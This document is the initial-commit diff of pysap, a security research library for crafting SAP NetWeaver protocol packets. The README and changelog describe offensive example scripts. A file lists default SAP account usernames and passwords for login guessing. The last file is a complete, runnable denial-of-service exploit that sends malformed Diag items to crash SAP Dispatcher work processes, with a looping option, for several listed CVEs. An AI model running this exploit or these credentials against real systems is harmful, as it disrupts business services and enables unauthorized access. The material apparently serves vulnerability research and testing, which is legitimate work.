Initial commit

Author: Martin Gallo

COPYING

@@ -0,0 +1,72 @@
+2014-03-25 Martin Gallo <[email protected]>
+
+	* - Version v0.1.4 released at Troopers'14.
+	* - Changelog now in GNU format.
+	* - Changed setup from distutils to setuptools.
+	* - Added some unit tests.
+	* - Arranged most of the code according to PEP8. 
+	* pysap/SAPDiagItems.py: Fixed some support bits and added new ones found
+	on SAP GUI version 7.30.
+	* pysap/SAPDiagItems.py: Added new Diag Items: WindowsSize.
+	* pysap/SAPEnqueue.py: New packet classes. Crafting of Enqueue Server
+	packets: Connection Admin and Server Admin.
+	* pysap/SAPNI.py: Fixed handling of NI_PING keep-alive requests.
+	* pysap/SAPNI.py: Added logging namespace 'sapni' for all NI layer
+	activity.
+	* pysap/SAPMS.py: New packet classes. Crafting of Message Server packets.
+	* pysap/SAPRouter.py: New packet classes. Crafting of SAP Router packets:
+	Route, Admin, Control and Error Information.
+	* pysap/SAPSNC.py: New packet class. Container for SNC Frame packets.
+	* pysapcompress/pysapcompress.cpp: Splitted exception class in two:
+	CompressError and DecompressError.
+	* examples/ms_change_param.py: Added example for retrieving or changing a 
+	parameter value using MS Admin set_param commands.
+	* examples/ms_dump_info.py: New example script for retrieving information
+	using MS Admin dump commands. 
+	* examples/ms_impersonator.py: New example script for impersonating an
+	application server connected to a Message Server service instance.
+	* examples/ms_listener.py: New example script for connecting to a Message
+	Server and listening for messages coming from the server.
+	* examples/ms_messager.py: New example script for sending a message to a
+	connected client throught the Message Server.
+	* examples/ms_monitor.py: New example script for monitoring the Message
+	Server service (msmon tool on steroids).
+	* examples/ms_observer.py: New example script for connecting to a Message
+	Server service and observe clients connecting to it (msprot tool).
+	* examples/router_admin.py: New example script for performing
+	administrative tasks on a SAP Route. Includes undocumented commands.
+	* examples/router_portfw.py: New example script for routing native
+	connections through SAP Router. 
+	* examples/router_scanner.py: New example script for scanning internal
+	hosts using SAP Router.
+
+2013-08-28  Martin Gallo  <[email protected]>
+
+	* - Version v0.1.3 released.
+	* - Added general documentation and setup.py command to build it using
+	epydoc.
+	* pysap/SAPNI.py: Refactored the SAP Diag Proxy and Server modules to a
+	base NI	implementation.
+	* pysapcompress/pysapcompress.cpp: Added handling of error return codes.
+	* examples/diag_interceptor.py: Refactored to use the new NIProxy
+	implementation. Fixed some hanging issues. Thanks Florian Grunow for the
+	feedbackm!
+	* examples/diag_login_brute_force.py: Handling of license errors.
+
+2012-09-27  Martin Gallo  <[email protected]>
+
+	* - Version v0.1.2 released at Brucon'12.
+	* pysap/SAPNI.py, pysap/SAPDiag.py: Network Interface packet class moved to
+	a new module. Binding of the SAPNI/protocol layer is performed now by each
+	script to allow the use of different protocols with SAPNI.
+	* pysap/SAPNI.py: Added a NI Stream Socket class for using it instead of
+	the	base Stream Socket.
+	* pysap/SAPDiagItems.py: Added new Diag Atom types, as used in NW 7.01 and
+	early versions.
+	* examples/diag_rogue_server.py: Minor fixes.
+	* examples/diag_render_login_screen.py: Minor fixes.
+	* examples/diag_login_brute_force.py: Added multi-thread support.
+
+2012-07-29  Martin Gallo  <[email protected]>
+
+	* - Initial version v0.1.1 releaseed at Defcon 20.

ChangeLog

@@ -0,0 +1,116 @@
+pysap - Python library for crafting SAP's network protocols packets
+
+Copyright (C) 2014 Core Security Technologies
+
+The library was designed and developed by Martin Gallo from the Security
+Consulting Services team of Core Security Technologies.
+
+Version 0.1.4 (March 2014)
+
+
+Overview:
+========
+
+SAP Netweaver [1] is a technology platform for building and integrating SAP
+business applications. Communication between components uses different network
+protocols. While some of them are standard and well-known protocols, others
+are proprietaries and public information is not available.
+
+This Python library provides modules for crafting and sending packets using
+SAP's NI, Message Server, Router, RFC, SNC, Enqueue and Diag protocols. The
+modules are based on Scapy [2] and are based on information acquired at
+researching the different protocols and services. Detailed information about
+the research can be found at [3], [4], [5], [6] and [7].
+
+
+Features:
+========
+
+This tool counts with the following components:
+
+- SAPNI module
+    Scapy class for the SAP NI (Network Interface protocol). It also includes a
+    Stream Socket implementation for the SAP NI protocol, as well as a base 
+    proxy and server implementations.
+
+- SAPDiag module
+    Contain Scapy classes for craft and dissect DiagDP headers, Diag packets 
+    and items. The main class is SAPDiag that is in charge of handling 
+    compression/decompression of payload items and serve as a container for 
+    them.
+
+- SAPDiagItems module
+    Some classes for craft and dissect common Diag items.
+
+- SAPDiagClient module
+    Basic class for establishing a connection with an application server.
+
+- SAPEnqueue module
+	Scapy classes for the Enqueue protocol.
+
+- SAPRouter module
+    Scapy classes for the different SAP Router packets (route, control, error
+    and admin messages).
+
+- SAPMS module
+    Scapy classes for the Message Server protocol.
+    
+- SAPSNC module
+	Basic class to serve as container of SNC Frames found in SAPRouter and
+	SAP Diag packets. 
+
+- Examples
+    Example and proof of concept scripts to illustrate the use of the different
+    modules and protocols: login brute force, gather information on the
+    application server, intercept communications, a rogue Diag server
+    implementation, test of Denial of Server issues [4], a Message Server
+    monitor implementation, listener/messager for Message Server, SAP Router
+    internal networks scanner and port forwarder, etc.
+	
+
+Installation & Build:
+====================
+
+Install using Python's setuptools. Installation is as follows:
+
+1) python setup.py test
+
+2) python setup.py install
+
+Some scapy installations also requires the following steps:
+    Edit the file supersocket.py (located for example on 
+    	/usr/local/lib/python2.7/dist-packages/scapy/supersocket.py)
+    Add the line: from scapy.packet import Padding
+
+
+Example uses:
+============
+
+Examples can be found at the examples directory.
+
+
+License:
+=======
+
+This library is distributed under the GPLv2 license. Check the COPYING file for
+more details.
+
+
+References:
+==========
+
+[1] http://www.sap.com/platform/netweaver/index.epx
+[2] http://www.secdev.org/projects/scapy/
+[3] http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=pysap
+[4] http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities
+[5] http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities
+[6] http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=Uncovering_SAP_vulnerabilities
+[7] http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=saps_network_protocols_revisited
+
+
+Contact:
+=======
+
+Whether you want to report a bug or give some suggestions on this package, drop
+us a few lines at [email protected] or contact the author email 
+[email protected].

README

@@ -0,0 +1,6 @@
+SAP*:06071992:*
+SAP*:PASS:*
+DDIC:19920706:000,001
+TMSADM:PASSWORD:000
+EARLYWATCH:SUPPORT:066
+SAPCPIC:ADMIN:000,001

examples/default_sap_credentials

@@ -0,0 +1,142 @@
+#!/usr/bin/python
+## ===========
+## pysap - Python library for crafting SAP's network protocols packets
+##
+## Copyright (C) 2014 Core Security Technologies
+##
+## The library was designed and developed by Martin Gallo from the Security
+## Consulting Services team of Core Security Technologies.
+##
+## This program is free software; you can redistribute it and/or
+## modify it under the terms of the GNU General Public License
+## as published by the Free Software Foundation; either version 2
+## of the License, or (at your option) any later version.
+##
+## This program is distributed in the hope that it will be useful,
+## but WITHOUT ANY WARRANTY; without even the implied warranty of
+## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+## GNU General Public License for more details.
+##==============
+
+# Standard imports
+import logging
+from time import sleep
+from optparse import OptionParser, OptionGroup
+# External imports
+from scapy.config import conf
+from scapy.packet import bind_layers
+from scapy.supersocket import socket
+# Custom imports
+from pysap.SAPNI import SAPNI
+from pysap.SAPDiagClient import SAPDiagConnection
+from pysap.SAPDiag import SAPDiag, SAPDiagDP, SAPDiagItem
+
+
+# Bind the SAPDiag layer
+bind_layers(SAPNI, SAPDiag,)
+bind_layers(SAPNI, SAPDiagDP,)
+bind_layers(SAPDiagDP, SAPDiag,)
+bind_layers(SAPDiag, SAPDiagItem,)
+bind_layers(SAPDiagItem, SAPDiagItem,)
+
+
+# Set the verbosity to 0
+conf.verb = 0
+
+
+# Command line options parser
+def parse_options():
+
+    description = \
+    """This example script can be used to tests against Denial of Service vulnerabilities affecting the Dispatcher service. Currently 5 different vulnerabilities can be triggered.
+    """
+
+    epilog = \
+    """pysap - http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=pysap"""
+
+    usage = "Usage: %prog [options] -d <remote host>"
+
+    parser = OptionParser(usage=usage, description=description, epilog=epilog)
+
+    target = OptionGroup(parser, "Target")
+    target.add_option("-d", "--remote-host", dest="remote_host", help="Remote host")
+    target.add_option("-p", "--remote-port", dest="remote_port", type="int", help="Remote port [%default]", default=3200)
+    parser.add_option_group(target)
+
+    misc = OptionGroup(parser, "Misc options")
+    misc.add_option("-l", "--loop", dest="loop", action="store_true", help="Loop until the user cancel (Ctrl+C) [%default]", default=False)
+    misc.add_option("-n", "--number", dest="number", type="int", help="Number of packets to seand each round (work processes to get down) [%default]", default=1)
+    misc.add_option("-t", "--time", dest="delay", type="int", help="Time to wait between each round [%default]", default=5)
+    misc.add_option("-c", "--cve", dest="cve", type="int", help="Number of CVE to trigger (1-6) [%default]", default=5)
+    misc.add_option("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output [%default]")
+    parser.add_option_group(misc)
+
+    (options, _) = parser.parse_args()
+
+    if not options.remote_host:
+        parser.error("Remote host is required")
+    if options.cve > 6:
+        parser.error("Invalid CVE")
+
+    return options
+
+
+def send_crash(host, port, item, number, verbose):
+    for i in range(number):
+        # Create the connection to the SAP Netweaver server
+        try:
+            if verbose:
+                print "[*] Sending crash #", i + 1
+            connection = SAPDiagConnection(host, port, init=True)
+            connection.send_message([item])
+        except socket.error:
+            if verbose:
+                print "[*] Connection error"
+
+
+# Main function
+def main():
+    options = parse_options()
+
+    if options.verbose:
+        logging.basicConfig(level=logging.DEBUG)
+
+    print "[*] Testing Dispatcher DoS vulnerabilities on host", options.remote_host, "port", options.remote_port
+
+    # Crafting the item according to the CVE selected
+    if options.cve == 1:
+        print "[*] Crash in DiagTraceHex (CVE-2012-2612) using a DataStream (Diag XML Blob) (requires Dialog Developer Trace enabled at level 2 or 3)"
+        item = SAPDiagItem(item_type="DIAG_XMLBLOB", item_length=0xFFFFFFFF, item_value="Crash!")
+    elif options.cve == 2:
+        print "[*] Crash in DiagTraceHex (CVE-2012-2612) using a variable ST_USER ST_USER_PASSPORT_DATA item (requires Dialog Developer Trace enabled at level 2 or 3)"
+        item = SAPDiagItem(item_type="APPL4", item_id="ST_USER", item_sid=0x18, item_length=0xFFFFFFFF, item_value="Crash!")
+    elif options.cve == 3:
+        print "[*] Crash in DiagTraceAtoms (CVE-2012-2511) using a DYNT ATOM item (requires Dialog Developer Trace enabled at level 2 or 3)"
+        item = SAPDiagItem(item_type="APPL4", item_id="DYNT", item_sid=0x02, item_value="\x80" * 8)
+    elif options.cve == 4:
+        print "[*] Crash in DiagTraceStreamI (CVE-2012-2512) using a RCUI RCUI_CONNECT_DATA item (requires Dialog Developer Trace enabled at level 2 or 3)"
+        item = SAPDiagItem(item_type="APPL", item_id="RCUI", item_sid=0x09, item_length=0xFF, item_value="\x12\x1A\x59\x51")
+    elif options.cve == 5:
+        print "[*] Crash in diaginput (CVE-2012-2513) using a VARINFO MAINAREA_PIXELSIZE item"
+        item = SAPDiagItem(item_type="APPL", item_id="VARINFO", item_sid=0x0e, item_value="A" * 10)
+    elif options.cve == 6:
+        print "[*] Crash in DiagiEventSource (CVE-2012-2514) using a UI_EVENT UI_EVENT_SOURCE item"
+        item = SAPDiagItem(item_type="APPL", item_id="UI_EVENT", item_sid=0x01, item_value="A" * 16)
+
+    if options.loop:
+        try:
+            while True:
+                if options.verbose:
+                    print "[*] Started a new round"
+                send_crash(options.remote_host, options.remote_port, item, options.number, options.verbose)
+                sleep(options.delay)
+        except KeyboardInterrupt:
+            print "[*] Cancelled by the user"
+    else:
+        print "[*] Selected a single round"
+        send_crash(options.remote_host, options.remote_port, item, options.number, options.verbose)
+        print "[*] Crash sent, take a look at the work processes !"
+
+
+if __name__ == "__main__":
+    main()